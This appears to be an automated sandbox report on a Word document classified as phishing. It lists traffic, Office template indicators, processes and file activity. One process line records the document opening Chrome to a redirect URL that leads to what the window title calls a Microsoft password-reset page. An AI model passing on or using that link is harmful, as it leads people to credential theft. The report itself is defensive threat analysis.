Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.179:443 -> 192.168.2.17:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49856 version: TLS 1.2

Source: harvardanglia2008officeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: gb.xsl.0.dr	OLE indicator, VBA macros: true
Source: sist02.xsl.0.dr	OLE indicator, VBA macros: true
Source: gostname.xsl.0.dr	OLE indicator, VBA macros: true
Source: chicago.xsl.0.dr	OLE indicator, VBA macros: true
Source: turabian.xsl.0.dr	OLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.dr	OLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.dr	OLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: iso690.xsl.0.dr	OLE indicator, VBA macros: true
Source: gosttitle.xsl.0.dr	OLE indicator, VBA macros: true

Source: harvardanglia2008officeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Window title found: microsoft online password reset - google chrome chrome legacy window

Source: classification engine

Classification label: mal72.phis.winDOCX@22/280@49/17

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{74C349BB-2D48-421D-9E91-C0AF6D2153BA} - OProcSessId.dat

Jump to behavior

Source: Insight design set.dotx.0.dr	OLE indicator, Word Document stream: true
Source: Equations.dotx.0.dr	OLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	OLE indicator, Word Document stream: true
Source: Element design set.dotx.0.dr	OLE indicator, Word Document stream: true
Source: msoE848.tmp.0.dr	OLE indicator, Word Document stream: true

Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx" /o ""
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1920,i,2782846156800102121,14241505822711078173,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe "C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe" -ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1920,i,2782846156800102121,14241505822711078173,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: cortana.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: sharedlibrary.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: mrt100_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: mrt100.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.ui.xaml.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.staterepositoryclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: uiamanager.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.ui.core.textinput.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: windows.ui.xaml.controls.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Section loaded: threadpoolwinrt.dll	Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: NoteID [4962398] _Secure_Document_Mrettinger-46568.LNK.0.dr	LNK file: ..\..\..\..\..\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
Source: Google Drive.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: Insight design set.dotx.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
